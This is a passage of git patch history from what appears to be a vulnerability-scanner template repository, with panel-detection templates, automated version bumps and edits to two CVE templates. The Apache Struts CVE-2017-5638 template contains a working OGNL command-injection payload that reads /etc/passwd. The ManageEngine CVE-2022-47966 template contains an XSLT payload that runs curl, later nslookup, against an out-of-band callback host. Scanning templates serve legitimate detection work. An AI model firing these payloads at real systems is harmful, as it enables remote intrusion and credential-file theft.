myLittleBackup Panel + author: nullfuzz + severity: info + description: | + myLittleBackup is a third-party tool that you can use to manipulate Backup SQL databases. + reference: + - http://www.mylittlebackup.com/mlb/en/overview.aspx + metadata: + verified: true + shodan-query: http.html:"myLittleBackup" + tags: panel,mylittlebackup,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/mlb/" + - "{{BaseURL}}/mylittlebackup/" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'myLittleBackup for SQL Server')" + condition: and \ No newline at end of file From a7a2798bca5bbd489a4d69b37f3a4bbdea319b99 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 04:02:04 +0000 Subject: [PATCH 1038/1133] Auto WordPress Plugins Update [Fri Jan 20 04:02:04 UTC 2023] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/autoptimize.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wp-migrate-db.txt | 2 +- technologies/wordpress/plugins/elementskit-lite.yaml | 2 +- 9 files changed, 9 insertions(+), 9 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index c745147036..fac63b0278 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.1.22 \ No newline at end of file +3.1.23 \ No newline at end of file diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt index b532f3dc33..97ceee1b9f 100644 --- a/helpers/wordpress/plugins/autoptimize.txt +++ b/helpers/wordpress/plugins/autoptimize.txt @@ -1 +1 @@ -3.1.4 \ No newline at end of file +3.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 4d0ffae7b5..4fb2e5db32 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.3.0 \ No newline at end of file +9.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index 007c71d612..99ed85a423 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.3.21 \ No newline at end of file +4.3.22 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 6acdb44289..26e33797ac 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.0.3 \ No newline at end of file +2.0.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 41bd15e2ea..a4f1569d8e 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.0.7 \ No newline at end of file +6.0.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 7c32728738..e3a4f19336 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt index fad066f801..914ec96711 100644 --- a/helpers/wordpress/plugins/wp-migrate-db.txt +++ b/helpers/wordpress/plugins/wp-migrate-db.txt @@ -1 +1 @@ -2.5.0 \ No newline at end of file +2.6.0 \ No newline at end of file diff --git a/technologies/wordpress/plugins/elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml index 089ed23cb3..29dd80c162 100644 --- a/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor addons Detection + name: ElementsKit Elementor Addons and Templates Library Detection author: ricardomaia severity: info reference: From 6d4fb715d20efecd86eb7e0bfb47558cd34b1f89 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 20 Jan 2023 07:18:41 +0000 Subject: [PATCH 1039/1133] Auto Generated New Template Addition List [Fri Jan 20 07:18:40 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 37a6b0a244..b83f88dab4 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposed-panels/ldap-account-manager-panel.yaml +exposed-panels/machform-admin-panel.yaml exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml exposed-panels/mylittleadmin-panel.yaml From c3fd0f6bad2e97812c065e015347c3c3a32be58b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 13:35:18 +0530 Subject: [PATCH 1040/1133] updated request, added metadata --- cves/2017/CVE-2017-5638.yaml | 22 +++++++++------------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index b6298cb04b..4553a953d9 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -4,36 +4,32 @@ info: name: Apache Struts 2 - Remote Command Execution author: Random_Robbie severity: critical - description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. + description: | + Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. reference: - https://github.com/mazen160/struts-pwn - - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 - https://isc.sans.edu/diary/22169 - https://github.com/rapid7/metasploit-framework/issues/8064 + - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - tags: apache,kev,msf,cve,cve2017,struts,rce + metadata: + verified: true + shodan-query: html:"Apache Struts" + tags: cve,cve2017,apache,kev,msf,struts,rce requests: - raw: - - |+ + - | GET / HTTP/1.1 Host: {{Hostname}} - Content-Type: %{(#tess='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close + Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} - unsafe: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" From 6a6cf254f1c5be3e144f4ca713a4c69c66dd4748 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 20 Jan 2023 14:00:43 +0530 Subject: [PATCH 1041/1133] updated request and format --- cves/2022/CVE-2022-47966.yaml | 53 ++++------------------------------- 1 file changed, 6 insertions(+), 47 deletions(-) diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml index d0260110a1..2f51119c6e 100644 --- a/cves/2022/CVE-2022-47966.yaml +++ b/cves/2022/CVE-2022-47966.yaml @@ -1,7 +1,7 @@ id: CVE-2022-47966 info: - name: ManageEngine - RCE + name: ManageEngine - Remote Command Execution author: rootxharsh,iamnoooob,DhiyaneshDK severity: critical description: | @@ -10,64 +10,23 @@ info: - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-47966 + classification: + cve-id: CVE-2022-47966 metadata: verified: "true" shodan-query: title:"ManageEngine" - tags: cve,cve2022,rce,zoho,manageengine + tags: cve,cve2022,rce,zoho,manageengine,oast variables: - cmd: '<?xml version="1.0" encoding="UTF-8"?> -<samlp:Response - ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" - InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" - IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> - <samlp:Status> - <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> - </samlp:Status> - <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" - IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> - <Issuer>a</Issuer> - <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> - <ds:SignedInfo> - <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> - <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> - <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> - <ds:Transforms> - <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> - <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> - <xsl:stylesheet version="1.0" - xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" - xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <xsl:variable name="rtobject" select="rt:getRuntime()"/> - <xsl:variable name="process" select="rt:exec($rtobject,"curl {{interactsh-url}}")"/> - <xsl:variable name="processString" select="ob:toString($process)"/> - <xsl:value-of select="$processString"/> - </xsl:template> - </xsl:stylesheet> - </ds:Transform> - </ds:Transforms> - <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> - <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> - </ds:Reference> - </ds:SignedInfo> -<ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> - <ds:KeyInfo/> - </ds:Signature> - </Assertion> -</samlp:Response>' + cmd: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,"curl {{interactsh-url}}")"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>' requests: - raw: - | POST /SamlResponseServlet HTTP/2 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 - Origin: null Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8 SAMLResponse={{url_encode(base64(cmd))}}&RelayState= From bf879191fffbc117c9928bbde299cbdfec3c1535 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 20 Jan 2023 15:19:07 +0530 Subject: [PATCH 1042/1133] Create tooljet-panel.yaml --- exposed-panels/tooljet-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/tooljet-panel.yaml diff --git a/exposed-panels/tooljet-panel.yaml b/exposed-panels/tooljet-panel.yaml new file mode 100644 index 0000000000..ef38b9d121 --- /dev/null +++ b/exposed-panels/tooljet-panel.yaml @@ -0,0 +1,25 @@ +id: tooljet-panel + +info: + name: ToolJet Panel + author: DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: title:"ToolJet - Dashboard" + tags: panel,tooljet,login + +requests: + - method: GET + path: + - "{{BaseURL}}/login?redirectTo=/" + + matchers-condition: and + matchers: + - type: word + words: + - "ToolJet - Dashboard" + + - type: status + status: + - 200 From 6d5e37ef485026e314a3a48b607541b09ee2b452 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 20 Jan 2023 16:36:16 +0530 Subject: [PATCH 1043/1133] using nslookup instead of curl + misc update --- cves/2022/CVE-2022-47966.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml index 2f51119c6e..402837a664 100644 --- a/cves/2022/CVE-2022-47966.yaml +++ b/cves/2022/CVE-2022-47966.yaml @@ -19,7 +19,8 @@ info: tags: cve,cve2022,rce,zoho,manageengine,oast variables: - cmd: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,"curl {{interactsh-url}}")"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>' + cmd: 'nslookup {{interactsh-url}}' + body: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,"{{cmd}}")"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>' requests: - raw: @@ -28,7 +29,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - SAMLResponse={{url_encode(base64(cmd))}}&RelayState= + SAMLResponse={{url_encode(base64(body))}}&RelayState= matchers-condition: and matchers: @@ -44,4 +45,4 @@ requests: - type: status status: - - 500 + - 500 \ No newline at end of file From 700bea11ddc82b7701d8240dc7840eb999b5ee98 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 20 Jan 2023 16:39:38 +0530 Subject: [PATCH 1044/1133] misc update --- cves/2022/CVE-2022-47966.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-47966.yaml b/cves/2022/CVE-2022-47966.yaml index 402837a664..63ce07b69f 100644 --- a/cves/2022/CVE-2022-47966.yaml +++ b/cves/2022/CVE-2022-47966.yaml @@ -20,7 +20,7 @@ info: variables: cmd: 'nslookup {{interactsh-url}}' - body: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,"{{cmd}}")"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>' + SAMLResponse: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,"{{cmd}}")"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> 